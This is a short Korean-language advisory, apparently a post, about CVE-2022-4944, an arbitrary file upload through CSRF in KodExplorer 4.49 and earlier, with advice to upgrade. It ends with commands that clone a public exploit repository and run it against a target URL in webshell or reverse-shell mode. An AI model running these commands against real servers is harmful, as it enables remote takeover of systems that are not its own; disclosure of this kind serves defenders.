
「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF를 통한 임의 파일 업로드

kalcaddle KodExplorer 4.49까지에서 문제로 분류된 취약점이 발견되었습니다. 이는 알 수 없는 부분에 영향을 미칩니다. 이 조작으로 인해 교차 사이트 요청 위조가 발생합니다. 이 취약점은 CVE-2022-4944로 고유하게 식별됩니다. 원격으로 공격을 시작할 수 있습니다. 또한, 익스플로잇이 존재합니다. 영향을 받는 구성 요소를 업그레이드하는 것이 권장됩니다.

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode